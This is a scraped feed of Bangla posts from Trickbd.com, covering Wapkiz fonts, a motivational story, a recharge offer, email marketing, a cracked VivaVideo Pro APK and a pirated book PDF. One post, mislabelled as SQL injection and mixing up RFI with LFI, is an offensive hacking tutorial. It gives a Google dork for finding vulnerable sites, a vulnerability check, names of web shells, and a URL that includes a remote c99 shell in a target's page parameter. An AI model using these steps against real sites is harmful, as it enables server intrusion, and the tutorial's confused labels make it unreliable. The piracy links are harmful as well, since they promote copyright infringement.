Search box..

Wapkiz এ বাংলা Font যোগ করবো কিভাবে || How To Add Bangla Font In Wapkiz Website

Wapkiz এ বাংলা Font যোগ করবো কিভাবে || How To Add Bangla Font In Wapkiz Website


Wapkiz এ বাংলা Font যোগ করবো কিভাবে || How To Add Bangla Font In Wapkiz Website

Posted:

আসসালামু আলাইকুম,

আপনি চাচ্ছেন যে আপনার wapkiz ওয়েবসাইটে বাংলা ফন্ট যোগ করবেন। কিন্তু কিভাবে করবেন?

যেমন এই সাইটটি,
TiptopBD – Wapkiz Website

এটা করার জন্য আপনাদের প্রথমে এই ওয়েব সাইটে যাওয়া লাগবে
Fonts.Maateen.Me

তারপর navigation

এখানে দেখুন আপনাদের জন্য রাখা আছে অনেক ফন্ট।

পছন্দ মতন একটা সিলেক্ট করুন
যেমন আমি এটা নিলাম শুধু দেখানোর জন্য। (মোটেও এই ফন্ট টা আমার পছন্দ না 🤣)

তারপর আপনাদের পছন্দকৃত ফন্ট টি সাইটে যোগ করার জন্য তাদের দেওয়া প্রথম কোড টি কপি করে নিন

এই কোড টি নিয়ে আপনাদের সাইটের Meta Header এ সবার উপরে paste করুন।

সেটাতে যাওয়ার জন্য এভাবে যেতে পারেন
প্রথমে ওয়াপকিযে লগিন করে নিচের মত করুন


তারপর সবার উপরে পেস্ট

তারপর পুরো সাইটে এই ফন্ট টা শো করানোর জন্য css এ সবার নিচে এই কোড টি যোগ করে নিন


Style ট্যাগের ভেতরে একদম শেষে

তারপর আবার style tag এর ভেতরেই
ঐ কোডটি আবার।ছাড়ুন আর body লেখা টা কেটে a করে দিন।

এবার দেখুন

আর আপনি যদি শুধু একটি মাত্র জায়গায় একটি মাত্র ট্যাগ এ ব্যবহার করতে চান তাহলে এই property টা ব্যবহার করতে পারেন

ভিডিও আকারে দেখুনঃ

আজ এই পর্যন্তই ভালো লাগলে লাইক কমেন্ট।
আর কম দামে wapkiz সাইট বানাতে চাইলে আমাদের ফেসবুক পেইজে মেসেজ দিতে পারেন 🥰

Our FaceBook Page

Our Youtube Channel

The post Wapkiz এ বাংলা Font যোগ করবো কিভাবে || How To Add Bangla Font In Wapkiz Website appeared first on Trickbd.com.

Sql injection bangla part 2 (last part )

Posted:

Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
উদাহারণঃ http://www.Targetsite.com/index.php?page=index.php
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে
"inurl:index.php?page="
এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।
উদাহারণঃ www.targetsite.com/index.php?page=www.google.com

যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ
http://www.example.com/v2/index.php?page=http://google.com/
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc…
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt
http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।
http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt

ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।

The post Sql injection bangla part 2 (last part ) appeared first on Trickbd.com.

VivaVideo Pro Apk 8.11.3 Full for Android

Posted:

বর্তমান সময়ে প্রায় সবাই ভিডিও এডিট করতে চায় । কিন্তু ভালো কোনো ভিডিও এডিটর না থাকার কারণে ভিডিও এডিটিং করতে পারে না। আজকে আমি একটা ফুল ভার্সন ভিডিও এডিটর নিয়ে আলোচনা করবো । তাহলে দেরি না করে বিস্তারিত আলোচনা করা যাক।

VivaVideo Pro একটি পাওয়ারফুল ভিডিও এডিটর । ভিভা ভিডিও এডিটর দিয়ে অনেক ধরণের ভিডিও বানাতে পারবেন । পছন্দের সময়গুলোকে নিজেই রেকর্ড করে এবং শুধু কোনো পিসি সফটওয়্যার ব্যবহার না করেই সুন্দর মুভি স্টাইলে ভিডিও বানাতে পারবেন । VivaVideo Pro এডিটরে নিম্নলিখিত ফিচার্স গুলো রয়েছেঃ

VivaVideo Pro Features

  1. Watermark-free videos
  2. Unlimited video length★New features
  3. 1 video editor app to have multi trimmer for a single video!
  4. 1 video editor app to support multi title adding with animated bubble style!
  5. 1 video editor pro app to support multi music and dubbing adding!
  6. 1 video editor app to have more themes, effects, titles, and transitions downloads for FREE!Key Features: Creative & Fun video cam

VivaVideo Pro More Features

  1. Unique storyboard shooting style to tell your own story easily.**Quick photo movie maker**
  2. Create the great video slideshow from your album less than one minute!**Video PIP(Picture in Picture) maker**
  3. Merge clips with stylish templates, more funny and creative**Easy but Powerful video editor**
  4. Provide quick & professional editing modes for normal and pro users
  5. Multi trimmer for single video
  6. Storyboarding editing, easy to merge videos and make the montage.
  7. One click to enhance your videos using stylish themes
  8. Highlight your videos with filters, FX, transitions, titles, music and live dubbing.
  9. All editing operations can be instant previewed in WYSIWYG way
  10. Editing session can be saved for later
  11. More themes, effects, filters, titles and transitions can be downloaded for FREE!**Export and share**
  12. Export your videos to the gallery
  13. Share your masterpieces to facebook, youtube, instagram, vine, email and etcFive star us if you like VivaVideo pro apk
VivaVideo Pro Apk 8.11.3 Full for Android
VivaVideo Pro Apk 8.11.3 Full for android
VivaVideo Pro Apk 8.11.3 Full for android

ডাউনলোড লিংসঃ

Click here to Download

The post VivaVideo Pro Apk 8.11.3 Full for Android appeared first on Trickbd.com.

পড়াশুনা করার নেশা – Sandeep Maheshwari Motivational Video Summary in BANGLA

Posted:

আসসালামু আলাইকুম সবাই কেমন আছেন…..? আশা করি সবাই ভালো আছেন । আমি আল্লাহর রহমতে ভালোই আছি ।আসলে কেউ ভালো না থাকলে TrickBD তে ভিজিট করেনা ।তাই আপনাকে TrickBD তে আসার জন্য ধন্যবাদ ।ভালো কিছু জানতে সবাই TrickBD এর সাথেই থাকুন ।

পড়াশুনা করার নেশা

আজ আমি আপনার সাথে দুজন জমজ ভাইয়ের গল্প শেয়ার করব। যার মধ্যে একজনের নাম পড়াকু আরেক জনের নাম লড়াকু। পড়াকু আর লড়াকু দুজনেই একই স্কুলে পড়ে। তারা একটি মিডিল ক্লাস ফ্যামিলি থেকে বিলং করে এবং তাদের মা বাবার মেন্টালিটি কিছুটা এরকম। লেখাপড়া করে যে সে হয় নবাব খেলাধুলা করে যে সে হয় খারাপ। ছোটবেলা থেকেই তাদের মা-বাবা সারাক্ষণ পড়াকু আর লড়াকুকে এই কথাটা বারবার বলে এসেছে।

তো মা বাবার মুখ থেকে বার বার শুনতে শুনতে পড়াকু এই কথাটাকে সত্যি বলে মেনে নেয় আর সেই মতো খেলাধুলা সব বাদ দিয়ে সারা দিন শুধু লেখাপড়া করতে শুরু করে দেয় মানে লেখাপড়া করার পর পড়াকুর কাছে নেশার মতো হয়ে দাঁড়ায়। অন্য দিকে লড়াকুকে যখনই তার মা-বাবা এই কথাটা বলতো যে লেখাপড়া করে যে সেই হয় নবাব খেলাধুলা করে যে সে হয় খারাপ। লড়াকু তার মা-বাবাকে প্রশ্ন করত কেন তাহলে শচীনের সবাই এত ভক্ত কেন। তখন মা-বাবার কাছে লড়াকুকে দেওয়ার মতো কোন উত্তর থাকতো না। ফলে লড়াকু মা বাবার এ ডায়লগটাকে কোনদিনই সিরিয়াসলি নিতো না।

লড়াকুও পরতো কিন্তু শুধু যাতে পরীক্ষায় ফেল না করে যায় সেই জন্য যেটুকু করা দরকার সেটুকু। মানে স্কুলে লড়াকু একটা পিরিয়ড যদি ক্লাস করত আর একটা পিরিয়ড ক্লাস দিয়ে বাইরে বেরিয়ে খেলাধুলা করে বেড়াতো। খেলার জন্য কাউকে না পেলে গাছপালা ফড়িং এসব নিয়েই মেতে থাকতো। অন্যদিকে পড়াকু সেইজে ঘন্টা পড়ার পর ক্লাসে বসতো আর সে স্কুল ছুটি হওয়ার পর সেখান থেকে বের হতো। ফলে স্বাভাবিক পড়াকু সবসময় পরীক্ষার ফাস্ট হতো এবং মা-বাবার কাছে পড়াকু সবসময় প্রশংসা পেত আর লড়াকু সবসময় বকার, পিটুনী খেতে।

লড়াকুর মা লড়াকুকে যখনি বলতো তোর পাড়াগুলো একটু মুখস্ত করতে কি হয় তখন লড়াকু মাকে বলতো মুখস্ত করে কি করবো সব গুগল এই রয়েছে একটা সার্চ করলেই তো দরকার জেনে নেওয়া যায়। ফালতু ফালতু মাথার মধ্যে ঢুকিয়ে বোঝা বাড়িয়ে কি লাভ তখন লড়াকুর মা লড়াকুকে বলতো শোনো গুগোল এ থাকলে কিন্তু তুমি চাকরি পাবে না। লড়াকু বলতো সোনা ওরম চাকরির আমার দরকার নেই। আমি মানুষ হয়ে বাঁচতে চাই রোবট হয়ে না। টাকা কামানোর জন্য কি চাকরি করা ছাড়া আর উপায় নেই নাকি। মাকে ডেঙ্গানোর জন্য লড়াই আবার মার কাছে পিটুনি খেতে হতো।

এভাবে কোনরকমে টেনেটুনে হায়ার সেকেন্ডারি পাস করার পর লড়াকু পড়ালেখা ছেড়ে দিলাম। ক্লাস টুয়েলভ এর পর থেকে লড়াকুর মধ্যে ফটোগ্রাফির নেশা দেখা দিতে শুরু হলো। অন্যদিকে পড়াকু নিজের লেখা পড়ার নেশা ফুল দমে চালিয়ে যেতে লাগল। আস্তে আস্তে পড়াকু বিভিন্ন ডিগ্রীর কালেক্ট করে ফেললো। কিন্তু সমস্যাটা হলো সারাদিন শুধু বইয়ে মুখ গুজে পড়ে থাকার ফলে পড়াকুর ব্যবহারিক বুদ্ধি হয়ে গেছিল জিরো আর পার্সোনালিটি ডেভেলাপমেন্ট বলতেও কিছুই হয়েছিল না পড়াকুর।

অচেনা কোন লোকের সাথে ঠিকভাবে কথা বলতে পারতোনা পড়াকু। ফলে ডিগ্রী প্রচুর থাকলেও পড়াকুকে বেকার হয়ে ঘরে বসে থাকতে হলো এরপর শেষ পর্যন্ত এত লেখাপড়া করে এত ডিগ্রী নিয়ে পড়াকে পিয়নের চাকরিতে ঢুকতে হলো। যে পিয়নের চাকরির জন্য নূন্যতম যোগ্যতা ছিল মাধ্যমিক পাস। মানে মাধ্যমিকের পর থেকে আট দশ বছর ধরে পড়াকু সারাদিন পাগলের মত পড়ে গেল তারা কিছুই সারা জীবনে কাজে লাগবে না।

পড়াকুর মানে নিজের লাইফের বেস্ট আট থেকে দশ বছর যে সময় হেলথ এনার্জি একদম ফুল থাকে সেই পুরোটা সময় পড়াকু নিজের সো কল্ড ভালো নেশা লেখাপড়ার পিছনে সম্পূর্ণ নষ্ট করে ফেলল। অন্যদিকে ক্লাস টুয়েলভ এর পর থেকে লড়াকু যখন পড়াশোনা ছেড়ে দিয়ে ফটোগ্রাফির নেশায় বুঁদ হয়ে গেল। তখন মা বাবার লড়াকুকে নিয়ে আরো চিন্তা বেড়ে গেল প্রতিমুহূর্তে লড়াকুকে মা-বাবার কাছে কথা শুনতে হতো। এরকম সময় একদিন পড়াকুর ভাই লড়াকুকে ডেকে জিজ্ঞেস করল। ভাই তুই ফটোগ্রাফি করে কি করবি। তো লড়াকু বলল সেটা জানিনা কিন্তু নিজের কিছু একটা করবো কোন স্টার্টআপ মেবি।

তো পড়াকু বললো আরে নিজের কিছু করতে গেলে শুরুতে অনেক টাকা লাগে তোকে অত টাকা কে দেবে।লড়াকু বললো কেন ছোট করে শুরু করব আস্তে আস্তে সেখান থেকেই টাকা জমিয়ে জমিয়ে বড় করব। তো পড়াকু বললো হুহ এই রকম মনে হয়। পড়াকুর মাথাটা ভিষন ভাবে ছোটবেলা থেকেই গেঁথে গিয়েছিল যে জীবনে বড় কিছু করতে গেলে তার একটাই রাস্তা লেখাপড়া করা। এছাড়া আর কোনো রাস্তা নেই আর নিজের এই বিষয়গুলোর প্রতি নেশাগ্রস্ত ছিল যে কারণে সারাদিন শুধু বইয়ে মুখ গুজে পড়ে থাকতো।

কখনো নিজের বিশ্বাসগুলো উপর পড়াকু কোশ্চেন মার্ক লাগাতো না। কিন্তু লড়াকুর মানুষিকতা ছিল অন্যরকম। লড়াকু মনে করত এই পৃথিবীতে যে কোন জায়গায় পৌঁছানোর একটা না অসংখ্য রাস্তা থাকে। তাই লাইফে বড় কিছু করারও শুধু একটাই রাস্তা লেখাপড়া করা এটা ভুল ধারণা। আরো অসংখ্য রাস্তা আছে টাকা রোজগার করে বড় কিছু করার। তো পড়াকু নিজস্ব সো কোল্ড ভালো নেশা পড়াশোনা চালিয়ে গিয়ে লাখ লাখ টাকা এই পড়াশোনার পিছনে খরচ করে শেষ অবধি ১০ -১৫ হাজার টাকার ফিস্ক বেতনের একটা চাকরি জোগাড় করতে সক্ষম হলো।

অন্যদিকে লড়াকু সবার বার বার নিষেধ করা সত্ত্বেও নিজের উপর বিশ্বাস রেখে নিজের সো কোল্ড বাজে নেশা ফটোগ্রাফি নেশা চালিয়ে গিয়ে স্টক ফটোগ্রাফির উপর ইমেজে স্মার্ট নামে নিজের একটা কোম্পানি শুরু করলো। যেহেতু ছোটবেলা থেকে লড়াকুর বেশিরভাগ সময়টা ক্লাস রুমের বাইরে কেটেছিল ভিতরে না তাই লড়াকুর ব্যবহারিক বুদ্ধি হয়ে উঠেছিল অসাধারণ। পড়াকু যখন রোবটের মত শুধু এবং শুধু ইনফর্মেশন নিজের মাথায় ফিট করছিল।

লড়াকু তখন লাইফকে জান ছিল আর সেই ব্যবহারিক বুদ্ধিকে কাজে লাগিয়ে লড়াকু নিজের স্টক ফটোগ্রাফটিকে কোম্পানিকে মাল্টিন্যাশনাল কোম্পানির লেভেলে নিয়ে চলে গেল। ফলে টুয়েল্ভ পাস লড়াকুর মান্থলি ইনকাম দাঁড়ালো চার-পাঁচটা বেকার ডিগ্রী পাস করা পড়াকুর থেকে 10 গুণ বেশি। এবার মা-বাবা পড়াকুকে বকাবকি করতে শুরু করলো। লড়াকুকে দেখে পড়াকুকে কিছু শিখতে বলতে শুরু করল। মানে এখন মা-বাবার কাছে লড়াকু খুব ভালো হয়ে গেল আর পড়াকু হয়ে গেল বোকা।

না তখন পড়াকুকে বলতে শুরু করল শোনো এই দশ পনেরো হাজার টাকার চাকরি দিয়ে কিন্তু সংসার চলবেনা লড়াকুর মত বুদ্ধি খাটিয়ে কিছু একটা করো। তো পড়াকু আর লড়াকু স্টরি আমাদের এটা শেখায় যে জরুরি না আমরা যেটাকে ভালো জিনিস বলে ভাবি সেটা আসলেই ভালো বা যে জিনিসটাকে আমরা খারাপ বলে ভাবি এটা আসলেই খারাপ। আসল জিনিসটা হলো সমস্ত বিশ্বাস বা ধারণাকে সঠিক বলে মেনে নেওয়ার আগে তার পিছনে একটা কোশ্চেন মার্ক লাগানো প্রশ্ন করে দেখা ধারণাটা কি আসলেই সত্যি নাকি ডাহা মিথ্যা।

যখন আলবার্ট আইনস্টাইন বলেছিলেন → Education is not the learning of facts.But the training of the mind to think অর্থাৎ শিক্ষা মানে শুধু কিছু তথ্য সংগ্রহ করা নয় শিক্ষা মানে কিভাবে চিন্তা ভাবনা করতে হয় তার প্রশিক্ষণ।

এই জিনিসগুলো আমি সন্দীপ স্যারের অ্যাডিকশন টু এডুকেশন ভিডিওটা থেকে শিখেছি। যারা হিন্দি ভালো বোঝেন না তাদের জন্য এবং ভিডিওটি মূল কথাগুলো অল্প সময়ের মধ্যে আর একটু ইন্টারেস্টিং ভাবে তুলে ধরার উদ্দেশ্যে আমি এই সামারি আর্টিকেল বানিয়েছি।

আপনার ওয়েবসাইটের জন্য আর্টিকেল প্রয়োজন হলে আমার সাথে যোগাযোগ করতে পারেন ফেসবুকে আমি

ভালো লাগলে আমার সাইটের পোস্ট গুলি দেখে আসতে পারেন এখানে আমি প্রতিদিন নতুন নতুন আপডেট দিয়ে থাকি আজকের আপডেট
link:

ওয়েবসাইট এর জন্য এসইও (SEO) কি? অফ পেজ এবং অন পেজ এসইও (SEO) কাকে বলে

The post পড়াশুনা করার নেশা – Sandeep Maheshwari Motivational Video Summary in BANGLA appeared first on Trickbd.com.

[Hot] Airtel Number এ ৯৭ টাকা রিচার্জ করে নিয়ে নিন ১৬০ মিনিট সাথে ১০০% ক্যাশব্যাক (শর্ত প্রযোজ্য)

Posted:

বিকাশ অ্যাপ থেকে অথবা *২৪৭# ডায়াল করে যেকোনো Airtel Number৯৭ টাকা বিকাশ থেকে মোবাইল রিচার্জ করলেই প্রতি মিনিটে প্রথম ১ জন পাবেন ১০০% ক্যাশব্যাক (অর্থাৎ ৯৭ টাকাই ক্যাশব্যাক) সাথে থাকছে ১৬০ টকটাইম (মিনিট এর মেয়াদঃ ৭ দিন)

অফারটি চলবে ১৫ সেপ্টেম্বর ২০২১ইং পর্যন্ত।

মোবাইল রিচার্জ করতে হবে প্রতিদিন সকাল ৯টা থেকে রাত ১১:৫৯ টা পর্যন্ত.!!

অফার চলাকালীন এক জন বিকাশ একাউন্ট গ্রাহক একবারই ক্যাশব্যাক পাবেন কিন্তু একাদিক বার ৯৭ টাকা বিকাশ থেকে মোবাইল রিচার্জ করতে পারবেন।

প্রতি মিনিটে প্রথম বিজয়ী গ্রাহক ক্যাম্পেইন শেষ হওয়ার পরবর্তী কার্যদিবসে ক্যাশব্যাক পাবেন।

মোবাইল রিচার্জ করতে বিকাশ অ্যাপ অথবা *২৪৭# ডায়াল করে মোবাইল রিচার্জ অপশন এ গিয়ে মোবাইল রিচার্জ করতে হবে ।

যেকোনো প্রয়োজনে Facebook এ আমি..!!

নতুন বিকাশ একাউন্ট খুলে ১৫০ টাকা বোনাস নিয়ে নিন

বাংলালিংক সিমে ফ্রি 1GB নিয়ে নিন

 

টেকনিক্যাল বিষয়ে যে কোনো কিছু জানতে ওয়েবসাইট থেকে ঘুরে আসার আমন্ত্রন করা হল

ধন্যবাদ

The post [Hot] Airtel Number এ ৯৭ টাকা রিচার্জ করে নিয়ে নিন ১৬০ মিনিট সাথে ১০০% ক্যাশব্যাক (শর্ত প্রযোজ্য) appeared first on Trickbd.com.

আমার বড় ভাই হুমায়ুন আহমেদ pdf বই Free Download

Posted:

Amar Boro Bhai Humayun Ahmed pdf book. সাদাসিধে কথা – হুমায়ূন আহমেদের শেষ জীবনের কাহিনী / ঘটনা। হুমায়ূন আহমেদ এর শেষ জীবন।

আমার বড় ভাই হুমায়ুন আহমেদ বই রিভিউঃ

জনপ্রিয় লেখক হুমায়ুন আহমেদের বাবা ১৯৭১ সালে মুক্তযুদ্ধের সময়ে মারা যান তার মা কিভাবে যেন তার ৬ ছেলেমেয়েকে নিয়ে পালিয়ে বেচেঁ যায়। হুমায়ুন আহমেদরা ছিলো ৬ ভাইবোন, তার বাবা মারা যাওয়ার পর তাদের পরিবারে নেমে এলো অভাব অনটন। কোনোরকম কয়েক বছর কাটানোর পরে সাংসারিক অবস্থা মোটামুটি ফিরে পেল, এরপরে হুমায়ুন আহমেদের ছোট ভাই জাফর ইকবালকে পড়ালেখার জন্য বিদেশে পাঠালো, কয়েকবছর পরে হুমায়ুন আহমেদ নিজেও পড়ালেখার জন্য বিদেশ গেলেন এবং জাফর ইকবালের আগেই দেশে ফিরে এসে টেলিভিশনের জন্য নাটক লেখা শুরু করে, এরপরেই বাজারে তার নাম ছড়িয়ে পড়ে।

হুমায়ুন আহমেদ নাটক লিখে জনপ্রিয়তা পাওয়ার পরে বই লেখা শুরু করে, তার বইগুলো ও খুব জনপ্রিয়তা পায়। তার কাছে টাকাপয়সা ও আসতে থাকে যথেষ্ট পরিমানে, বিবাহ বন্ধনে আবদ্ধ হয় এরপর কিছু বছর পরে তার বৈবাহিক জীবনে অশান্তি নেমে আসে তখন হুমায়ুন আহমেদের ৪ ছেলেমেয়ে, এই সময়ে স্ত্রীকে ডিভোর্স দিয়ে দেয়। হুমায়ুন আহমেদের অনেক নাম ডাক আছে দেশে তার সমস্যা না হলেও বেচারা তার স্ত্রী তো এখন ছোট ছোট ৪ ছেলেমেয়ে নিয়ে অসহায়, তাই হুমায়ুন আহমেদের মা এবং ভাইবোনেরা চায় ডিভোর্স দেওয়ার পরেও যেন হুমায়ূন আহমেদের বউ এই পরিবারের একজন না হয়েও যেন থাকতে পারে তাই জাফর ইকবাল গিয়ে তার বড় ভাইকে বলে বুঝিয়ে যে ভাবিতো এখন অসহায় আমি ভাবিকে সাপোর্ট করতে চাই, হুমায়ুন কিছুক্ষণ তাকিয়ে থেকে বলে থাক।

এর কয়েমাস পরেই হুমায়ূন আহমেদের ক্যান্সার ধরা পড়ে এবং চিকিৎসার জন্য বিদেশে চলে যায়। অপারেশন ও সফল হয় কিন্তু আবার তাকে হাসপাতালে ভর্তি হতে হয়, খুবই বেশী অসুস্থ মেডিকেল থেকে তাদের পরিবারের লোকজনকে ২৪ ঘন্টার মধ্যে পৌছতে বলা হয়েছে। জাফর ইকবাল ও তার স্ত্রী সেখানে যায়, গিয়ে দেখে তাকে উচু একটা বিছানায় ঘুম পাড়িয়ে রেখেছে ঔষধ দিয়ে, সুস্থ হলেই জাগিয়ে তোলা হবে।

প্রতিদিন পাখি ডাকা সকালে তারা দুজন হাসপাতে যায় আবার অনেক রাত পর বাসায় ফিরে এভাবে কিছুদিন যাবার পরে হঠাৎ এক সকালে হুমায়ূন আহমেদের মা ফোন করলো জাফর ইকবালের কাছে বলল, জাফর বাবা তুই শিগ্রই যা তোর বড় ভাইয়ের কাছে আমার সকাল থেকে শরীরটা অস্থির করছে, খুব অস্থিরতা তুই তারাতা‌ড়ি হুমায়ুনের কাছে যা।

জাফর আর তার স্ত্রী তাই তাড়াহুড়া করে হাসপাতালে পৌঁছলো গিয়ে দেখে নার্স ডাক্তাররা তার ভাইয়ের বেডের চারপাশে ভিড় করে দাড়িয়ে যন্ত্রপাতি নিয়ে ব্যাস্ত। ডাক্তাররা তাদের দুজনকে দেখে অন্য ডাক্তার ও নার্সদের ইশারা করলো আপনজনদের কাছে আসতে দাও, একজন তরুণ নার্স কেদে কেদে বললো আর মাত্র কিছুক্ষণ এই পৃথিবীতে আছে ……. খুব শিগ্রই চলে যাবে। হুমায়ূনের ব্লাড প্রেশার কমতেছে, মাথার ব্লেড প্রেশার কমতেছে, মস্তিষ্কের নিউরন সেল গুলো ধিরে ধিরে মরে যাচ্ছে 😭

এরপর কিছুক্ষণের মধ্যেই মারা গেল হুমায়ূন আহমেদ। মুহাম্মাদ জাফর ইকবাল একজন বিজ্ঞানের ছাত্র তার মাথায় কিছুতেই ঢুকছেনা তার মা কিভাবে আগেই বুঝতে পারলো তার সন্তানের মৃত্যু হবে একটু পরে এই ভেবে তিনি বললেন আমি এই সংবাদ মাকে জানাতে পারবোনা, এই নিষ্ঠুরতম কাজ তার স্ত্রী করলো, সে ফোন করে বাড়ির সবাইকে জানালো।
আমি এই রিভিউতে অনেক কিছু এড়িয়ে সংক্ষেপে লিখেছি, হুমায়ূন আহমেদের শেষ জীবনের কাহিনী / ঘটনা জানতে pdf টি পড়ুন।

বইয়ের নামঃ আমার বড় ভাই হুমায়ুন আহমেদ।
বইয়ের লেখকঃ মুহাম্মাদ জাফর ইকবাল (এই লেখকের All PDF বই)
বইয়ের ধরনঃ আত্মজীবনী
পিডিএফ সাইজঃ ২ মেগাবাইট প্রায়।
ডাউনলোডঃ Read Online / Download

১। যেকোনো বাংলা PDF বইয়ের জন্য ভিজিট করুন www.purepdfbook.com

২। মাল্টিপল নিশের সাইট ভিজিট করে দেখার আমন্ত্রণ রইলো www.DesherJonno.Com

The post আমার বড় ভাই হুমায়ুন আহমেদ pdf বই Free Download appeared first on Trickbd.com.

ইমেইল মার্কেটিং করে অনলাইন থেকে ইনকাম?

Posted:

আসসালামুআলাইকুম ওয়ারাহমাতুল্লাহি ওয়াবারাকাতুহ। ইমেল মার্কেটিং সম্পর্কে হয়তো বা আপনি শুনেছেন। তবে আপনি কি জানেন ইমেইল মার্কেটিং করে আয় করা যায়! হ্যাঁ ইমেইল মার্কেটিং করে আয় করা যায় অনলাইন থেকে। বর্তমান সময়ে ইমেল মার্কেটিং করে হাজার হাজার টাকা ইনকাম ঘরে বসেই করা যায়।

অনেকেই ইমেইল মার্কেটিং নিজের পেশা হিসেবে ধরে রেখেছেন। ইমেইল মার্কেটিং করে প্রতিমাসে লক্ষাধিক টাকা আয় করা কোন ব্যাপারই না।তবে তার জন্য আপনাকে ইমেইল মার্কেটিং সম্পর্কে ভালো জ্ঞান অর্জন করতে হবে।প্রপার নলেজ থাকলেই আপনি ইমেইল মার্কেটিং করে অনলাইন থেকে আয় করতে পারবেন।

আজকে আর্টিকেলে আমরা ইমেইল মার্কেটিং সম্পর্কে আলোচনা করব। যদি আপনার ইচ্ছুক হয় বা আগ্রহ হয় তাহলে আর্টিকেলটি শেষ পর্যন্ত পড়তে থাকুন। আশাকরি ইমেইল মার্কেটিং সম্পর্কে একটু হলেও জ্ঞান বৃদ্ধি পাবে।

ইমেইল মার্কেটিং কি কিভাবে কাজ করে?

ইমেইল মার্কেটিং: ইমেইল মার্কেটিং হল ডিজিটাল মার্কেটিং এর মতই। সহজ ভাষায় বলতে গেলে ইমেইল মার্কেটিং হল আপনার ব্যবসা প্রচার করা। যেমন কোনো পণ্য বা কোন টিউটোরিয়াল অথবা কোন সেবা মার্কেটিং হল ইমেইল মার্কেটিং।

কিভাবে কাজ করে ইমেইল মার্কেটিং: ইমেইল মার্কেটিং করার বিভিন্ন টুলস রয়েছে। টুলস এর কথা এই কারণে বললাম যেন কম সময়ে অধিক ইমেইল পাঠাতে পারেন। হ্যাঁ ভাই আপনি ঠিকই শুনেছেন কম সময়ে আপনি একাধিক মেইল পাঠাতে পারবেন টুলস এর মাধ্যমে।

আপনার পণ্য বা যেকোনো সেবা ইমেইলের মাধ্যমে অন্যদের জানান হল ইমেইল মার্কেটিং। আপনার প্রচারকৃত ইমেইল হাজার হাজার লোকের কাছে প্রচার করে কোন না কোন লোক তো আকৃষ্ট হবেই। এখান থেকে আপনি খুব সহজে মার্কেটিং করতে পারছেন।

ইমেইল মার্কেটিং করে কিভাবে ইনকাম করবো?

ইমেইল মার্কেটিং করে ইনকাম: ইমেইল মার্কেটিং করে আয় করার জন্য অনলাইনে বিভিন্ন মাধ্যম রয়েছে।আপনারা যে কোন মাধ্যম কাজে লাগিয়ে ইমেইল মার্কেটিং করে অনলাইন থেকে আয় করতে পারেন।

এফিলিয়েট এর মাধ্যমে ইমেইল মার্কেটিং: আপনারা চাইলে অ্যাফিলিয়েট ইমেইল মার্কেটিং এর মাধ্যমে আয় করতে পারেন। অ্যাফিলিয়েট মার্কেটিং করার জন্য বিভিন্ন প্রতিষ্ঠান রয়েছে। এই প্রতিষ্ঠান এর সাথে যুক্ত হয়ে তাদের সেবা বা প্রোডাক্ট গুলো আপনাকে বিক্রি করতে হবে।

আপনারা তাদের প্রোডাক্ট বা সেবাগুলো ইমেইল মার্কেটিংয়ের মাধ্যমে খুব সহজেই প্রচার করতে পারেন। কম সময়ে অধিক মেল এর মাধ্যমে আরও বেশ ভালো পরিমাণে ইমেইল মার্কেটিং করতে পারবেন। তাদের প্রোডাক্ট গুলো কেউ কিনলে আপনার কমিশন রয়েছে। এভাবে করে আপনারা অ্যাফিলিয়েট মার্কেটিং করতে পারেন ইমেইল মার্কেটিং এর সাহায্যে।এবং খুব সহজেই ইমেইল মার্কেটিং করে অনলাইন থেকে এই মাধ্যমে আয় করতে পারেন।

টিউটোরিয়াল ভিডিও : আপনার অথবা অন্য কারোর ভিডিও আপনি ইমেইল মার্কেটিং করে প্রচার করতে পারবেন। হ্যাঁ আপনার যদি কোন ভিডিও থেকে থাকে তাহলে সেটা আপনি টিউটোরিয়াল এর মাধ্যমে তাদের কাছে সুন্দরভাবে উপস্থাপন করতে পারবেন।

এতে আপনার সবটুকুই লাভ যদি ভিডিও হয় আপনার। তাছাড়া অন্য কারোর ভিডিও আপনি প্রমোট করে ইমেইল মার্কেটিংয়ের সাহায্য আয় করতে পারবেন। এটা খুবই সহজ এবং জনপ্রিয় একটি মাধ্যম ইমেল মার্কেটিং এর জন্য।

নিজের পণ্য বিক্রি করা : আপনি চাইলে আপনার নিজের পণ্যগুলো ইমেইল মার্কেটিং করে প্রচার করতে পারবেন। অথবা আপনার আত্মীয় স্বজনদের প্রতিষ্ঠান প্রোডাক্ট বা পণ্যগুলো ইমেইল মার্কেটিং করতে পারবেন।

